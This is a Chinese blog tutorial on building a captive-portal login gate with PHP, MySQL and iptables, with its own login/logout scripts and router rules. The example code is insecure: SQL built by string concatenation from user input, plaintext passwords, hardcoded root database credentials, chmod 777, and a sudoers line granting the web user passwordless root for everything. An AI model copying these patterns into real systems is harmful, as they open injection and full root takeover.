href="http://www.gbtags.com/gb/share/4247.htm" target="_blank" rel="noopener">原文链接</a> </div> </div> <div class="post-meta"> 作者 <a href="/authors/崔庆才" class="author" itemprop="url" rel="index">崔庆才</a> 发表于 <time title="创建时间：2015-10-28 19:24:09" itemprop="dateCreated datePublished" datetime="2015-10-28T19:24:09+08:00">2015-10-28</time> 阅读次数： 本文字数： 440 阅读时长 ≈ 1 分钟 </div> </article> <article itemscope itemtype="http://schema.org/Article" class="post-block index" lang="zh-CN"> <link itemprop="mainEntityOfPage" href="https://cuiqingcai.com/2138.html"> <meta itemprop="image" content="/images/avatar.png"> <meta itemprop="name" content="崔庆才"> <meta itemprop="description" content="静觅丨崔庆才的个人站点专业为您提供爬虫教程,爬虫,Python,Python爬虫,Python爬虫教程,爬虫书的相关信息，想要了解更多详情，请联系我们。"> <meta itemprop="name" content="静觅"> <header class="post-header"> <h2 class="post-title" itemprop="name headline"> <a class="label"> Net </a> <a href="/2138.html" class="post-title-link" itemprop="url">计算机网络探究二之利用PHP实现登录验证之后上网</a> </h2> </header> <div class="post-body" itemprop="articleBody"> <div class="thumb"> <img itemprop="contentUrl" class="random"> </div> <div class="excerpt"> <h2 id="综述"><a href="#综述" class="headerlink" title="综述"></a>综述</h2> 在上一篇文章中，客户机可以借助路由机直接上网，并没有什么登录限制。接下来我们将加入上网登录验证，只有输入了正确的用户名和密码才可以通过验证，然后才可以访问互联网。接下来，就跟随我用 PHP 来实现登录验证吧。 <h2 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h2> 在这之前，你需要配置一下 LAMP 环境，也就是 Apache，MySQL，PHP 开发环境，依次执行如下命令即可。 <figure class="highlight smali"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 6 7 </pre> </td> <td class="code"> <pre>sudo apt-get install apache2 sudo apt-get install php5 php5-cgi php5-mysql php5-curl php5-gd php5-idn php-pear php5-imagick php5-imap php5-mcrypt php5-memcache php5-mhash php5-ming php5-pspell php5-recode php5-snmp php5-tidy php5-xmlrpc php5-sqlite php5-xsl sudo apt-get install mysql-server mysql-client sudo apt-get install libapache2-mod-php5 sudo apt-get install libapache2-mod-auth-mysql sudo apt-get install phpmyadmin sudo ln -s /usr/share/phpmyadmin/ /var/www/html/phpmyadmin </pre> </td> </tr> </table> </figure> 如果配置出现问题，请查阅相关资料。 apache 默认的目录为 /var/www/html，我们这时访问 <a href="http://localhost" target="_blank" rel="noopener">localhost</a> 或者 <a href="http://192.168.122.4" target="_blank" rel="noopener">192.168.122.4</a>，都可以出现 apache 的欢迎界面，就证明我们配置成功了。 <h2 id="路由初始设置"><a href="#路由初始设置" class="headerlink" title="路由初始设置"></a>路由初始设置</h2> 为了在登录之前限制主机的上网，我们需要利用 iptables 规则来对数据包的转发加以限制。同时，将网页重定向到本机的登录界面。初始路由设置如下 <figure class="highlight routeros"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 6 7 8 9 </pre> </td> <td class="code"> <pre>iptables -F iptables -t nat -F iptables -t mangle -F iptables -P INPUT ACCEPT iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE iptables -t filter -A FORWARD -s 192.168.122.0/24 -o eth0 -j REJECT iptables -t filter -A FORWARD -s 192.168.122.0/24 -d 119.29.29.29/32 -j ACCEPT iptables -t nat -A PREROUTING -s 192.168.122.0/24 -p tcp -j DNAT --to 192.168.122.4 </pre> </td> </tr> </table> </figure> 首先清除所有的 iptables 规则，然后设置前一篇我们说的 IP 伪装，这时可以客户机可以通过主机上网。接下来的一条规则则禁用了来自 192.168.122.0 网段的所有 IP 的数据包转发，然后设置可访问 DNS 服务器，最后一条则设置了所有的 tcp 连接自动跳转到 192.168.122.4，也就是我们刚才配置的服务器。可以把以上规则保存为脚本，比如叫 init.sh 来运行，也可以添加到 /etc/rc.local 中，开机自动运行。 <h2 id="登录页面"><a href="#登录页面" class="headerlink" title="登录页面"></a>登录页面</h2> 访问到 192.168.122.4 时，我们需要给用户呈现的当然不是刚才显示的 apache 欢迎页面，而是登录的输入框以及登录按钮界面。所以，登录界面代码如下 <figure class="highlight xml"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 </pre> </td> <td class="code"> <pre><!DOCTYPE html> <html lang="zh-CN"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Auth Login</title>  <link rel="stylesheet" href="css/bootstrap.min.css"> </head> <body> <form id="auth" method="post"> <div class="input-group"> <span class="input-group-addon" id="basic-addon1">Username</span> <input type="text" class="form-control" placeholder="Username" aria-describedby="basic-addon1" name="username"> </div> <div class="input-group"> <span class="input-group-addon" id="basic-addon1">Password</span> <input type="text" class="form-control" placeholder="Password" aria-describedby="basic-addon1" name="password"> </div> <input type="button" id="login" class="btn btn-primary" value="Login"> <input type="button" id="logout" class="btn btn-primary" value="Logout"> </form>  <script src="js/jquery.min.js"></script>  <script src="js/bootstrap.min.js"></script> </body> <style> form { max-width:400px; margin:0 auto; } .input-group { margin-bottom:20px; } </style> <script> $(function(){ $("#login").on("click", function() { $("#auth").attr("action", "/login.php"); $("#auth").submit(); }); $("#logout").on("click", function() { $("#auth").attr("action", "/logout.php"); $("#auth").submit(); }); }); </script> </html> </pre> </td> </tr> </table> </figure> 其中的 js，jquery 文件请大家自行引入。预览一下效果 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151008151728.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151008151728.png" alt="20151008151728"></a> 在这里我们设置了两个按钮，一个是登录，一个是下线。 <h2 id="数据库查询验证"><a href="#数据库查询验证" class="headerlink" title="数据库查询验证"></a>数据库查询验证</h2> 接下来我们新建一个数据库，例如我新建了一个数据库叫 auth，然后数据表 user，里面有三个字段。分别是 id，username，password，我插入了一条数据。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151008152059.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151008152059.png" alt="20151008152059"></a> 接下来我们就尝试一下登录，提交到 login.php 文件验证一下。 <figure class="highlight xml"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 </pre> </td> <td class="code"> <pre><?php $mysql_server_name = "localhost"; $mysql_username = "root"; $mysql_password = "123456"; $mysql_database = "auth"; $username = @$_POST['username']; $password = @$_POST['password']; $ip=$_SERVER["REMOTE_ADDR"]; $conn=mysql_connect($mysql_server_name, $mysql_username, $mysql_password); if ($conn) { $sql = "select * from user where username = '".$username."'"; $result = mysql_fetch_array(mysql_db_query($mysql_database, $sql, $conn)); if ($result) { if ($result['password'] == $password) { $status = -1; system("sudo ./bash/login.sh $ip", $status); if ($status == 0) { echo "Login Successfully"; } else { echo "Login Failed"; } } else { echo "Wrong Password"; } } else { echo "Not"; } } else { die("Could Not Connect"); } ?> </pre> </td> </tr> </table> </figure> 其中，最重要的部分莫过于 <figure class="highlight perl"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>system("sudo ./bash/login.sh $ip", $status); </pre> </td> </tr> </table> </figure> 这一行代码了，此处便是登录验证用户名和密码之后执行的一个 Linux 脚本命令。在这里我把要执行的脚本写入了 login.sh 文件中，传入的参数便是 ip 地址。那么 login.sh 里面发生了什么事情呢，我们来看一下。 <figure class="highlight routeros"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 6 </pre> </td> <td class="code"> <pre>iptables -t nat -D PREROUTING -s $1/32 -j ACCEPT iptables -t nat -D PREROUTING -s $1/32 -p tcp -j ACCEPT iptables -t filter -D FORWARD -s $1/32 -o eth0 -j ACCEPT iptables -t nat -I PREROUTING -s $1/32 -j ACCEPT iptables -t nat -I PREROUTING -s $1/32 -p tcp -j ACCEPT iptables -t filter -I FORWARD -s $1/32 -o eth0 -j ACCEPT </pre> </td> </tr> </table> </figure> $1 的意思就是获取第一个参数，在这里就是 IP 地址，脚本主要做的事情就是放行来自这个 IP 地址的数据包，让其正常访问互联网。保存脚本后，记得给脚本赋予权限 <figure class="highlight angelscript"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>sudo chmod 777 login.sh </pre> </td> </tr> </table> </figure> -D 的意思就是删除，因为 iptables 是可以添加多次相同的规则的，在添加之前删除一下，以防止多次添加。在这里 <figure class="highlight armasm"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>sudo ./bash/login.sh $ip </pre> </td> </tr> </table> </figure> 执行命令脚本前，我们加了 sudo，意思就是管理员身份运行，但是仍然可能导致权限问题，因为命令的执行者是 PHP（其实是 www-data），而并不是 root 用户，所以我们需要修改一下执行权限。首先通过 PHP 文件获取执行该命令的用户是叫什么，比如新建一个 info.php 文件，输入如下内容： <figure class="highlight xml"> <table> <tr> <td class="gutter"> <pre>1 2 3 </pre> </td> <td class="code"> <pre><?php echo shell_exec("id -a"); ?> </pre> </td> </tr> </table> </figure> 看一下运行结果 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151008153424.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151008153424.png" alt="20151008153424"></a> 嗯，果然，执行用户是 www-data，这样我们只需要给 www-data 添加一个执行权限就好了。修改 /etc/sudoers 文件添加一行 <figure class="highlight fortran"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>www-data ALL=(ALL) NOPASSWD:ALL </pre> </td> </tr> </table> </figure> 意思是 www-data 以 root 身份运行并且不需要密码。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151008153700.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151008153700.png" alt="20151008153700"></a> 好，保存之后，我们尝试一下，就可以登录啦。 <h2 id="测试登录"><a href="#测试登录" class="headerlink" title="测试登录"></a>测试登录</h2> 在路由主机（Ubuntu Route）里面，初始化一下 iptables 规则，然后查看当前规则。我们发现当前访问都是被阻止的，而且 tcp 连接会自动跳转到 192.168.122.4 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151008154216.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151008154216.png" alt="20151008154216"></a> 现在我们登录客户机，随机打开一个网址，比如百度，就发现自动跳转到了登录界面 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151008154629.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151008154629.png" alt="20151008154629"></a> 输入用户名密码，尝试登陆，比如之前插入数据库的是 cqc，123456，输入之后登录。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151008162712.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151008162712.png" alt="20151008162712"></a> 提示登录成功之后，我们便可以欢乐地上网啦。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151008162926.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151008162926.png" alt="20151008162926"></a> 好，这样我们就完成了验证之后上网啦。 <h2 id="下线操作"><a href="#下线操作" class="headerlink" title="下线操作"></a>下线操作</h2> 同样的，下线操作我们同样写一个 logout.php <figure class="highlight xml"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 </pre> </td> <td class="code"> <pre><?php $mysql_server_name = "localhost"; $mysql_username = "root"; $mysql_password = "123456"; $mysql_database = "auth"; $username = @$_POST['username']; $password = @$_POST['password']; $ip=$_SERVER["REMOTE_ADDR"]; echo $ip; $conn=mysql_connect($mysql_server_name, $mysql_username, $mysql_password); if ($conn) { $sql = "select * from user where username = '".$username."'"; $result = mysql_fetch_array(mysql_db_query($mysql_database, $sql, $conn)); if ($result) { if ($result['password'] == $password) { $status = -1; system("sudo ./bash/logout.sh $ip", $status); if ($status == 0) { echo "Login Successfully"; } else { echo "Login Failed"; } } else { echo "Wrong Password"; } } else { echo "Not"; } } else { die("Could Not Connect"); } ?> </pre> </td> </tr> </table> </figure> 登出的脚本如下，其实就是单纯去除了刚才添加的路由规则 <figure class="highlight routeros"> <table> <tr> <td class="gutter"> <pre>1 2 3 </pre> </td> <td class="code"> <pre>iptables -t nat -D PREROUTING -s $1/32 -j ACCEPT iptables -t nat -D PREROUTING -s $1/32 -p tcp -j ACCEPT iptables -t filter -D FORWARD -s $1/32 -o eth0 -j ACCEPT </pre> </td> </tr> </table> </figure> 配置方式和登录一样，大家可以尝试下。 <h2 id="源代码"><a href="#源代码" class="headerlink" title="源代码"></a>源代码</h2> 在这里提供大家源代码下载 <a href="https://github.com/cqcre/PHPLogin" target="_blank" rel="noopener">源码下载</a> 如有问题，欢迎交流。 </div> </div> <div class="post-meta"> 作者 <a href="/authors/崔庆才" class="author" itemprop="url" rel="index">崔庆才</a> 发表于 <time title="创建时间：2015-10-08 00:27:44" itemprop="dateCreated datePublished" datetime="2015-10-08T00:27:44+08:00">2015-10-08</time> 阅读次数： 本文字数： 6.3k 阅读时长 ≈ 6 分钟 </div> </article> <script> document.querySelectorAll('.random').forEach(item => item.src="https://picsum.photos/id/" + Math.floor(Math.random() * Math.floor(300)) + "/200/133") </script> <nav class="pagination"> <a class="extend prev" rel="prev" href="/page/13/"></a><a class="page-number" href="/">1</a>…<a class="page-number" href="/page/13/">13</a>14<a class="page-number" href="/page/15/">15</a>…<a class="page-number" href="/page/18/">18</a><a class="extend next" rel="next" href="/page/15/"></a> </nav> </div> <script> window.addEventListener('tabs:register', () => { let { activeClass } = CONFIG.comments; if (CONFIG.comments.storage) { activeClass = localStorage.getItem('comments_active') || activeClass; } if (activeClass) { let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`); if (activeTab) { activeTab.click(); } } }); if (CONFIG.comments.storage) { window.addEventListener('tabs:click', event => { if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return; let commentClass = event.target.classList[1]; localStorage.setItem('comments_active', commentClass); }); } </script> </div> <div class="toggle sidebar-toggle"> </div> <aside class="sidebar"> <div class="sidebar-inner"> <ul class="sidebar-nav motion-element"> <li class="sidebar-nav-toc"> 文章目录 </li> <li class="sidebar-nav-overview"> 站点概览 </li> </ul>  <div class="post-toc-wrap sidebar-panel"> </div>  <div class="site-overview-wrap sidebar-panel"> <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person"> <img class="site-author-image" itemprop="image" alt="崔庆才" src="/images/avatar.png"> 崔庆才 <div class="site-description" itemprop="description">静觅丨崔庆才的个人站点专业为您提供爬虫教程,爬虫,Python,Python爬虫,Python爬虫教程,爬虫书的相关信息，想要了解更多详情，请联系我们。</div> </div> <div class="site-state-wrap motion-element"> <nav class="site-state"> <div class="site-state-item site-state-posts"> <a href="/archives/"> 685 日志 </a> </div> <div class="site-state-item site-state-categories"> <a href="/categories/"> 32 分类</a> </div> <div class="site-state-item site-state-tags"> <a href="/tags/"> 246 标签</a> </div> </nav> </div> <div class="links-of-author motion-element"> <a href="https://github.com/Germey" title="GitHub → https://github.com/Germey" rel="noopener" target="_blank">GitHub</a> <a href="mailto:cqc@cuiqingcai.com.com" title="邮件 → mailto:cqc@cuiqingcai.com.com" rel="noopener" target="_blank">邮件</a> <a href="https://weibo.com/cuiqingcai" title="微博 → https://weibo.com/cuiqingcai" rel="noopener" target="_blank">微博</a> <a href="https://www.zhihu.com/people/Germey" title="知乎 → https://www.zhihu.com/people/Germey" rel="noopener" target="_blank">知乎</a> </div> </div> <div style=" width: 100%;" class="sidebar-panel sidebar-panel-image sidebar-panel-active"> <a href="https://item.jd.com/13527222.html" target="_blank" rel="noopener"> <img src="https://cdn.cuiqingcai.com/ei5og.jpg" style=" width: 100%;"> </a> </div> <div class="sidebar-panel sidebar-panel-categories sidebar-panel-active"> <h4 class="name"> 分类 </h4> <div class="content"> <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/API/">API</a>5</li><li class="category-list-item"><a class="category-list-link" href="/categories/C-C/">C/C++</a>23</li><li class="category-list-item"><a class="category-list-link" href="/categories/HTML/">HTML</a>14</li><li class="category-list-item"><a class="category-list-link" href="/categories/Java/">Java</a>5</li><li class="category-list-item"><a class="category-list-link" href="/categories/JavaScript/">JavaScript</a>26</li><li class="category-list-item"><a class="category-list-link" href="/categories/Linux/">Linux</a>14</li><li class="category-list-item"><a class="category-list-link" href="/categories/Luma/">Luma</a>1</li><li class="category-list-item"><a class="category-list-link" href="/categories/Markdown/">Markdown</a>2</li><li class="category-list-item"><a class="category-list-link" href="/categories/Net/">Net</a>4</li><li class="category-list-item"><a class="category-list-link" href="/categories/Nexior/">Nexior</a>1</li><li class="category-list-item"><a class="category-list-link" href="/categories/Other/">Other</a>40</li><li class="category-list-item"><a class="category-list-link" href="/categories/PHP/">PHP</a>27</li><li class="category-list-item"><a class="category-list-link" href="/categories/Paper/">Paper</a>2</li><li class="category-list-item"><a class="category-list-link" href="/categories/Python/">Python</a>303</li><li class="category-list-item"><a class="category-list-link" href="/categories/TypeScript/">TypeScript</a>2</li><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%B8%AA%E4%BA%BA%E5%B1%95%E7%A4%BA/">个人展示</a>1</li><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%B8%AA%E4%BA%BA%E6%97%A5%E8%AE%B0/">个人日记</a>9</li><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%B8%AA%E4%BA%BA%E8%AE%B0%E5%BD%95/">个人记录</a>6</li><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%B8%AA%E4%BA%BA%E9%9A%8F%E7%AC%94/">个人随笔</a>21</li><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/">人工智能</a>5</li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%AE%89%E8%A3%85%E9%85%8D%E7%BD%AE/">安装配置</a>59</li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%8A%80%E6%9C%AF%E6%9D%82%E8%B0%88/">技术杂谈</a>96</li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%9C%AA%E5%88%86%E7%B1%BB/">未分类</a>1</li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0/">深度学习</a>1</li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%88%AC%E8%99%AB/">爬虫</a>4</li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%94%9F%E6%B4%BB%E7%AC%94%E8%AE%B0/">生活笔记</a>1</li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%A6%8F%E5%88%A9%E4%B8%93%E5%8C%BA/">福利专区</a>6</li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%81%8C%E4%BD%8D%E6%8E%A8%E8%8D%90/">职位推荐</a>1</li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%89%BA%E6%9C%AF%E4%BA%8C%E7%BB%B4%E7%A0%81/">艺术二维码</a>1</li></ul> </div> </div> <div class="sidebar-panel sidebar-panel-friends sidebar-panel-active"> <h4 class="name"> 友情链接 </h4> <ul class="friends"> <li class="friend"> <img src="https://cdn.cuiqingcai.com/j2dub.jpg"> <a href="https://www.findhao.net/" target="_blank" rel="noopener">FindHao</a> </li> <li class="friend"> <img src="https://cdn.cuiqingcai.com/6apxu.jpg"> <a href="https://www.51dev.com/" target="_blank" rel="noopener">IT技术社区</a> </li> <li class="friend"> <img src="https://cdn.cuiqingcai.com/bqlbs.png"> <a href="http://www.urselect.com/" target="_blank" rel="noopener">优社电商</a> </li> <li class="friend"> <img src="https://cdn.cuiqingcai.com/8s88c.jpg"> <a href="https://www.yuanrenxue.com/" target="_blank" rel="noopener">猿人学</a> </li> <li class="friend"> <img src="https://cdn.cuiqingcai.com/2wgg5.jpg"> <a href="https://www.yunlifang.cn/" target="_blank" rel="noopener">云立方</a> </li> <li class="friend"> <img src="http://qianxunclub.com/favicon.png"> <a href="http://qianxunclub.com/" target="_blank" rel="noopener">千寻啊千寻</a> </li> <li class="friend"> <img src="https://cdn.cuiqingcai.com/0044u.jpg"> <a href="http://kodcloud.com/" target="_blank" rel="noopener">可道云</a> </li> <li class="friend"> <img src="https://cdn.cuiqingcai.com/ygnpn.jpg"> <a href="http://www.kunkundashen.cn/" target="_blank" rel="noopener">坤坤大神</a> </li> <li class="friend"> <img src="https://cdn.cuiqingcai.com/x714o.jpg"> <a href="http://www.hubwiz.com/" target="_blank" rel="noopener">汇智网</a> </li> <li class="friend"> <img src="https://cdn.cuiqingcai.com/44hxf.png"> <a href="http://redstonewill.com/" target="_blank" rel="noopener">红色石头</a> </li> <li class="friend"> <img src="https://cdn.cuiqingcai.com/wkaus.jpg"> <a href="https://zhaoshuai.me/" target="_blank" rel="noopener">碎念</a> </li> <li class="friend"> <img src="https://cdn.cuiqingcai.com/pgo0r.jpg"> <a href="https://www.chenwenguan.com/" target="_blank" rel="noopener">陈文管的博客</a> </li> <li class="friend"> <img src="https://cdn.cuiqingcai.com/kk82a.jpg"> <a href="https://www.lxlinux.net/" target="_blank" rel="noopener">良许Linux教程网</a> </li> <li class="friend"> <img src="https://cdn.cuiqingcai.com/lj0t2.jpg"> <a href="https://tanqingbo.cn/" target="_blank" rel="noopener">IT码农</a> </li> <li class="friend"> <img src="https://cdn.cuiqingcai.com/i8cdr.png"> <a href="https://junyiseo.com/" target="_blank" rel="noopener">均益个人博客</a> </li> <li class="friend"> <img src="https://cdn.cuiqingcai.com/chwv2.png"> <a href="https://brucedone.com/" target="_blank" rel="noopener">大鱼的鱼塘</a> </li> <li class="friend"> <img src="https://www.91vps.com/favicon.ico"> <a href="http://www.91vps.com/" target="_blank" rel="noopener">91VPS</a> </li> <li class="friend"> <img src="https://webpage.qidian.qq.com/qidian/chatv3-gray/favicon.ico"> <a href="https://www.qg.net/" target="_blank" rel="noopener">青果网络</a> </li> </ul> </div> <div class="sidebar-panel sidebar-panel-tags sidebar-panel-active"> <h4 class="name"> 标签云 </h4> <div class="content"> <a href="/tags/2022/" style="font-size: 20px;">2022</a> <a href="/tags/2048/" style="font-size: 10px;">2048</a> <a href="/tags/ADSL/" style="font-size: 10px;">ADSL</a> <a href="/tags/API/" style="font-size: 16px;">API</a> <a href="/tags/Ajax/" style="font-size: 12px;">Ajax</a> <a href="/tags/Bootstrap/" style="font-size: 11px;">Bootstrap</a> <a href="/tags/Bug/" style="font-size: 10px;">Bug</a> <a href="/tags/CDN/" style="font-size: 10px;">CDN</a> <a href="/tags/CQC/" style="font-size: 10px;">CQC</a> <a href="/tags/CSS/" style="font-size: 10px;">CSS</a> <a href="/tags/CSS-%E5%8F%8D%E7%88%AC%E8%99%AB/" style="font-size: 10px;">CSS 反爬虫</a> <a href="/tags/CV/" style="font-size: 10px;">CV</a> <a href="/tags/ChatGPT/" style="font-size: 10px;">ChatGPT</a> <a href="/tags/Cookie/" style="font-size: 10px;">Cookie</a> <a href="/tags/Django/" style="font-size: 10px;">Django</a> <a href="/tags/Eclipse/" style="font-size: 11px;">Eclipse</a> <a href="/tags/Elasticsearch/" style="font-size: 10px;">Elasticsearch</a> <a href="/tags/FTP/" style="font-size: 10px;">FTP</a> <a href="/tags/Flux/" style="font-size: 10px;">Flux</a> <a href="/tags/Git/" style="font-size: 10px;">Git</a> <a href="/tags/GitHub/" style="font-size: 13px;">GitHub</a> <a href="/tags/HTML5/" style="font-size: 10px;">HTML5</a> <a href="/tags/HTTP/" style="font-size: 10px;">HTTP</a> <a href="/tags/Hailuo/" style="font-size: 10px;">Hailuo</a> <a href="/tags/Hexo/" style="font-size: 10px;">Hexo</a> <a href="/tags/Hook/" style="font-size: 10px;">Hook</a> <a href="/tags/IP/" style="font-size: 10px;">IP</a> <a href="/tags/IT/" style="font-size: 10px;">IT</a> <a href="/tags/JSON/" style="font-size: 10px;">JSON</a> <a href="/tags/JSP/" style="font-size: 10px;">JSP</a> <a href="/tags/JavaScript/" style="font-size: 14px;">JavaScript</a> <a href="/tags/K8s/" style="font-size: 10px;">K8s</a> <a href="/tags/LOGO/" style="font-size: 10px;">LOGO</a> <a href="/tags/Linux/" style="font-size: 10px;">Linux</a> <a href="/tags/Luma/" style="font-size: 10px;">Luma</a> <a href="/tags/MIUI/" style="font-size: 10px;">MIUI</a> <a href="/tags/Markdown/" style="font-size: 10px;">Markdown</a> <a href="/tags/Midjourney/" style="font-size: 11px;">Midjourney</a> <a href="/tags/MongoDB/" style="font-size: 11px;">MongoDB</a> <a href="/tags/MySQL/" style="font-size: 10px;">MySQL</a> <a href="/tags/Mysql/" style="font-size: 10px;">Mysql</a> <a href="/tags/NBA/" style="font-size: 10px;">NBA</a> <a href="/tags/Nexior/" style="font-size: 10px;">Nexior</a> <a href="/tags/OCR/" style="font-size: 10px;">OCR</a> <a href="/tags/OpenCV/" style="font-size: 10px;">OpenCV</a> <a href="/tags/PHP/" style="font-size: 11px;">PHP</a> <a href="/tags/PPT/" style="font-size: 10px;">PPT</a> <a href="/tags/PS/" style="font-size: 10px;">PS</a> <a href="/tags/Pathlib/" style="font-size: 10px;">Pathlib</a> <a href="/tags/PhantomJS/" style="font-size: 10px;">PhantomJS</a> <a href="/tags/Playwright/" style="font-size: 10px;">Playwright</a> <a href="/tags/Python/" style="font-size: 17px;">Python</a> <a href="/tags/Python-%E7%88%AC%E8%99%AB/" style="font-size: 18px;">Python 爬虫</a> <a href="/tags/Python3/" style="font-size: 11px;">Python3</a> <a href="/tags/Python3%E7%88%AC%E8%99%AB%E6%95%99%E7%A8%8B/" style="font-size: 12px;">Python3爬虫教程</a> <a href="/tags/Pythonic/" style="font-size: 10px;">Pythonic</a> <a href="/tags/Python%E7%88%AC%E8%99%AB/" style="font-size: 19px;">Python爬虫</a> <a href="/tags/Python%E7%88%AC%E8%99%AB%E4%B9%A6/" style="font-size: 12px;">Python爬虫书</a> <a href="/tags/Python%E7%88%AC%E8%99%AB%E6%95%99%E7%A8%8B/" style="font-size: 15px;">Python爬虫教程</a> <a href="/tags/QQ/" style="font-size: 10px;">QQ</a> <a href="/tags/RabbitMQ/" style="font-size: 10px;">RabbitMQ</a> <a href="/tags/ReCAPTCHA/" style="font-size: 10px;">ReCAPTCHA</a> <a href="/tags/Redis/" style="font-size: 10px;">Redis</a> <a href="/tags/Riffusion/" style="font-size: 10px;">Riffusion</a> <a href="/tags/SAE/" style="font-size: 10px;">SAE</a> <a href="/tags/SSH/" style="font-size: 10px;">SSH</a> <a href="/tags/SVG/" style="font-size: 10px;">SVG</a> <a href="/tags/Scrapy-redis/" style="font-size: 10px;">Scrapy-redis</a> <a href="/tags/Scrapy%E5%88%86%E5%B8%83%E5%BC%8F/" style="font-size: 10px;">Scrapy分布式</a> <a href="/tags/Selenium/" style="font-size: 11px;">Selenium</a> <a href="/tags/Session/" style="font-size: 10px;">Session</a> <a href="/tags/Shell/" style="font-size: 10px;">Shell</a> <a href="/tags/Suno/" style="font-size: 10px;">Suno</a> <a href="/tags/TKE/" style="font-size: 10px;">TKE</a> <a href="/tags/TXT/" style="font-size: 10px;">TXT</a> <a href="/tags/Terminal/" style="font-size: 10px;">Terminal</a> <a href="/tags/Ubuntu/" style="font-size: 11px;">Ubuntu</a> <a href="/tags/VS-Code/" style="font-size: 10px;">VS Code</a> <a href="/tags/Veo/" style="font-size: 10px;">Veo</a> <a href="/tags/Vercel/" style="font-size: 10px;">Vercel</a> <a href="/tags/Vs-Code/" style="font-size: 10px;">Vs Code</a> <a href="/tags/Vue/" style="font-size: 11px;">Vue</a> <a href="/tags/Web/" style="font-size: 10px;">Web</a> <a href="/tags/Webpack/" style="font-size: 10px;">Webpack</a> <a href="/tags/Web%E7%BD%91%E9%A1%B5/" style="font-size: 10px;">Web网页</a> <a href="/tags/Windows/" style="font-size: 10px;">Windows</a> <a href="/tags/Winpcap/" style="font-size: 10px;">Winpcap</a> <a href="/tags/WordPress/" style="font-size: 13px;">WordPress</a> <a href="/tags/XPath/" style="font-size: 12px;">XPath</a> <a href="/tags/Youtube/" style="font-size: 11px;">Youtube</a> <a href="/tags/acedata/" style="font-size: 12px;">acedata</a> <a href="/tags/aiohttp/" style="font-size: 10px;">aiohttp</a> <a href="/tags/android/" style="font-size: 10px;">android</a> <a href="/tags/ansible/" style="font-size: 10px;">ansible</a> <a href="/tags/api/" style="font-size: 13px;">api</a> <a href="/tags/chatgpt/" style="font-size: 10px;">chatgpt</a> <a href="/tags/cocos2d-x/" style="font-size: 10px;">cocos2d-x</a> <a href="/tags/dummy-change/" style="font-size: 10px;">dummy change</a> <a href="/tags/e6/" style="font-size: 10px;">e6</a> <a href="/tags/fitvids/" style="font-size: 10px;">fitvids</a> </div> <script> const tagsColors = ['#00a67c', '#5cb85c', '#d9534f', '#567e95', '#b37333', '#f4843d', '#15a287'] const tagsElements = document.querySelectorAll('.sidebar-panel-tags .content a') tagsElements.forEach((item) => { item.style.backgroundColor = tagsColors[Math.floor(Math.random() * tagsColors.length)] }) </script> </div> </div> </aside> <div id="sidebar-dimmer"></div> </div> </main> <footer class="footer"> <div class="footer-inner"> <div class="copyright"> 崔庆才丨静觅 © 